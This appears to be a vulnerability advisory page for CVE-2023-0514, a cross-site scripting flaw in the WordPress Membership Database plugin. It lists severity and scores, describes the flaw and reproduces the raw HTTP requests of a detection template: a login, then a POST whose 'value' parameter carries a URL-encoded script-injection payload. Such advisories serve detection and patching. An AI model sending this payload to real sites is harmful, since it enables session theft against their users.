🔙 목록으로 돌아가기

CVE-2023-0514: Membership Database <= 1.0 - Cross-Site Scripting

TitleMembership Database <= 1.0 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationUpgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor.
CVSS Score6.1
EPSS Score0.12454
CVE IDCVE-2023-0514
CWE IDCWE-79
Tags cve2023 cve wpscan membership-database wp wp-plugin wordpress authenticated xss membership_database_project vuln

🔍 Vulnerability Description

Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=yibuYz&pwd=h7QymM&wp-submit=Log+In
POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0514.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-0514.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A